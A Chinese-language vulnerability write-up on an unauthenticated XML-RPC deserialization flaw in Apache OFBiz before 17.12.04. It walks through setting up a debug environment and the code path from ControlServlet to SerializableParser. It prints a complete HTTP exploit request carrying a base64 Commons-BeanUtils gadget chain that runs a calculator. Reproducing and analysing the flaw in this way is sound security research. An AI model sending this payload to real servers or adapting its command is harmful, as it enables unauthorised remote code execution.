漏洞影响版本
ofbiz< 17.12.04
环境搭建
下载ofbiz、gradle后配置一下gradle的环境变量,随后直接运行gradle.bat进行build,最后./gradlew ofbiz --debug-jvm
调试端口默认是5005
或者你直接idea打开后初始化一下gradle项目
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308123628-13ec0920-5903-4770-89a2-55f09dec8e7a.png#averageHue=%232d323a&clientId=uef16c7b1-bc90-4&from=paste&height=234&id=u93a97e7f&originHeight=292&originWidth=540&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=24205&status=done&style=none&taskId=u235a14cd-b6c9-4e3c-81a3-b49db91d2aa&title=&width=432)
你会看到有个build,编译好后会出现一个ofbiz.jar
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308147571-50d90ce2-0977-4c41-9dba-67c9927db4f7.png#averageHue=%233e3323&clientId=uef16c7b1-bc90-4&from=paste&height=261&id=u1e3639fb&originHeight=326&originWidth=721&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=25424&status=done&style=none&taskId=u659c60fb-9977-42d1-9511-cdf774184d3&title=&width=576.8)
然后我们运行这个jar包就可以开始debug了。
想调试的时候发现这个漏洞vulhub开放了5005端口但是没开启debug模式啊。。。希望vulhub之后可以加上debug功能。
漏洞复现
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| GET /webtools/control/xmlrpc HTTP/1.1 Host: localhost:8443 Cookie: JSESSIONID=F637D1919F66DD42EED9EFF4B139CF3A.jvm1; Phpstorm-b3ad9363=84c4b31e-d5ed-4379-9a80-9b7507cedf1e; Pycharm-69800360=084fccb6-8efb-4ce0-ab83-e9ee9ec90c09; confluence.browse.space.cookie=space-blogposts; sidebar_collapsed=false; Goland-7a35ec7=48e3d45f-8c3b-456a-b871-9a45c9c01e45; cookie_token=ca76b89a250a514dd21370f8310865e199423e79b5b53392404ae1bb2ab24a8c; Phpstorm-b3ad9726=1202f496-542d-4162-91ec-bad957f445b9; lang=zh-cn; device=desktop; theme=default; OFBiz.Visitor=10000 Pragma: no-cache Cache-Control: no-cache Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close Content-Length: 1697
<?xml version="1.0"?> <methodCall> <methodName>ProjectDiscovery</methodName> <params> <param> <value> <struct> <member> <name>test</name> <value> <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAAVnK/rq+AAAAMQAZAQABYQcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAY8aW5pdD4BAAMoKVYBAARDb2RlBwADDAAFAAYKAAgACQEAEWphdmEvbGFuZy9SdW50aW1lBwALAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADQAOCgAMAA8BAARjYWxjCAARAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAEwAUCgAMABUBAApTb3VyY2VGaWxlAQAGYS5qYXZhACEAAgAEAAAAAAABAAEABQAGAAEABwAAABoAAgABAAAADiq3AAq4ABASErYAFlexAAAAAAABABcAAAACABhwdAAIYm9vZ2lwb3BwdwEAeHEAfgANeA==</serializable> </value> </member> </struct> </value> </param> </params> </methodCall>
|
发送以下数据包到xmlrpc接口即可弹出计算器,base64是cb1链
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709307870220-38b831e2-1ca1-4ec9-9b5a-036acec14271.png#averageHue=%23a3814d&clientId=uef16c7b1-bc90-4&from=paste&height=858&id=u2bd6bf5b&originHeight=1072&originWidth=1584&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=245179&status=done&style=none&taskId=u72edead3-d51f-4aef-98b1-0a20dc5cdd3&title=&width=1267.2)
漏洞分析
流程是比较简单,源自一个接口未授权。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308694133-aed6ee6e-bf46-4382-93da-092c25ec62fb.png#averageHue=%232b2f36&clientId=uf202677c-b400-4&from=paste&height=334&id=u956cdf88&originHeight=417&originWidth=1773&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=93223&status=done&style=none&taskId=u3d87d017-f5a2-43b1-a33f-e32f7c4ee3c&title=&width=1418.4)
从漏洞的URL/webapps/control/xmlrpc
可以找到web.xml文件,发现是由ControlServlet接管。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308755491-d429541e-c415-4d06-9585-08b97ab6dba8.png#averageHue=%2330343c&clientId=uf202677c-b400-4&from=paste&height=578&id=uc6dd9136&originHeight=722&originWidth=1796&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=211332&status=done&style=none&taskId=ub1422f52-9d6a-4e71-85b9-950ce8a4037&title=&width=1436.8)
因此定位到doGet方法内部,可以看到首先需要获取RequestHandler
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308776189-8910aa9b-82a0-49e1-b805-6d9f5c3f6f8e.png#averageHue=%23323641&clientId=uf202677c-b400-4&from=paste&height=282&id=uf436b096&originHeight=353&originWidth=1422&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=62936&status=done&style=none&taskId=u1900a440-d054-445d-8cb4-caf40445da6&title=&width=1137.6)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308791293-357b9541-5458-4a85-89a8-2d4f9214c613.png#averageHue=%23393c44&clientId=uf202677c-b400-4&from=paste&height=590&id=u2e9b0007&originHeight=737&originWidth=1367&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=114571&status=done&style=none&taskId=ud653c1c6-8add-4163-862e-9f92e866f63&title=&width=1093.6)
读取了controller.xml,我们看看内容
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709307799494-1a7eccea-ed94-4246-9250-0d2cfdf3fcbf.png#averageHue=%23282d36&clientId=uef16c7b1-bc90-4&from=paste&height=202&id=u899950f5&originHeight=253&originWidth=977&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=33882&status=done&style=none&taskId=u555f6da5-77eb-4a83-a851-3e118827517&title=&width=781.6)
发现xmlrpc路由的security是false,也就是不需要鉴权的。因此我们得以后续利用。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308834071-b50f392e-1512-4595-af49-a97e0eaa0163.png#averageHue=%2330343d&clientId=uf202677c-b400-4&from=paste&height=543&id=ucbce7d1d&originHeight=679&originWidth=1805&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=210875&status=done&style=none&taskId=u0ac549e8-e487-408f-bf17-6c06a999f2b&title=&width=1444)
在doGet后面我们会进入doRequest方法内部
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308856860-5e613717-1e82-4b39-b8a6-4b52c2554af5.png#averageHue=%232b2f37&clientId=uf202677c-b400-4&from=paste&height=508&id=u19229bb4&originHeight=635&originWidth=1384&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=116039&status=done&style=none&taskId=u3bd19b2e-059e-48a2-9356-f3df5ea65c3&title=&width=1107.2)
进而进入runEvent方法
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308871068-1561b3fa-ec03-43e0-be00-9233102e1e3f.png#averageHue=%23292e38&clientId=uf202677c-b400-4&from=paste&height=211&id=uc99e5a1e&originHeight=264&originWidth=1308&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=32675&status=done&style=none&taskId=u0d338246-a386-4c9b-84b7-dd9e39248b8&title=&width=1046.4)
进入XmlrpcRequestHandler的execute方法,首先获取了xmlrpc的config,然后读取了body流。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308902714-41e36825-22c2-4c31-8b7b-db1887192935.png#averageHue=%23323742&clientId=uf202677c-b400-4&from=paste&height=340&id=u72be03cd&originHeight=425&originWidth=1368&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=150573&status=done&style=none&taskId=u5bd43cfe-fcc7-4f71-bedf-e7c6a8eed13&title=&width=1094.4)
最后交给SAXParsers去处理。
在扫描xml的标签的时候会进入getparser方法获取对应tags的parser
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308945713-3a53f9da-eb56-4cdf-a20c-7f8488511de3.png#averageHue=%2330343e&clientId=uf202677c-b400-4&from=paste&height=424&id=ud8dc715b&originHeight=530&originWidth=1358&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=108111&status=done&style=none&taskId=u30e0798f-2cdb-4761-9bfb-080f0bfdf9b&title=&width=1086.4)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308951391-d5e999eb-7f45-4889-aaef-0c6cf62a6b93.png#averageHue=%23282c34&clientId=uf202677c-b400-4&from=paste&height=116&id=uae1ae9d7&originHeight=145&originWidth=919&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=15834&status=done&style=none&taskId=uc20f5be7-4d65-47be-ad15-71ac3d6267f&title=&width=735.2)
如果是serializable标签那么就返回SerializableParser
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308983458-372fe2af-d84e-474e-adb1-087e5c4353d2.png#averageHue=%23282d35&clientId=uf202677c-b400-4&from=paste&height=278&id=u6d113edf&originHeight=347&originWidth=1313&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=68185&status=done&style=none&taskId=ua27cbe29-3c3d-48e2-8471-c1a8994d41e&title=&width=1050.4)
它的父类是ByteArrayParser,在最后会调用startElement方法![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709309002610-668675d3-77cd-4c43-9457-23a6c3d54fab.png#averageHue=%23282c35&clientId=uf202677c-b400-4&from=paste&height=188&id=u92211069&originHeight=235&originWidth=1287&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=30284&status=done&style=none&taskId=u323f410f-b151-413e-ab98-d1e535bc4a9&title=&width=1029.6)
这里解密了我们的base64数据。最后在SerializerParser的getResult方法进行反序列化。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709309099570-1b8df000-8546-4abf-93c0-8650b589f260.png#averageHue=%2331353f&clientId=uf202677c-b400-4&from=paste&height=387&id=uaf10db47&originHeight=484&originWidth=1489&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=75513&status=done&style=none&taskId=u6edf3c9e-1e26-4edb-8f42-9c594e61738&title=&width=1191.2)
ofbiz内置cb依赖,因此可以打cb链。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709309115956-190596b9-a746-4c84-b10e-a5461b1ef830.png#averageHue=%23668e6f&clientId=uf202677c-b400-4&from=paste&height=523&id=u89ab0f72&originHeight=654&originWidth=1473&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=108605&status=done&style=none&taskId=u699c8bdf-cf32-45bd-8a7e-7e1551319f3&title=&width=1178.4)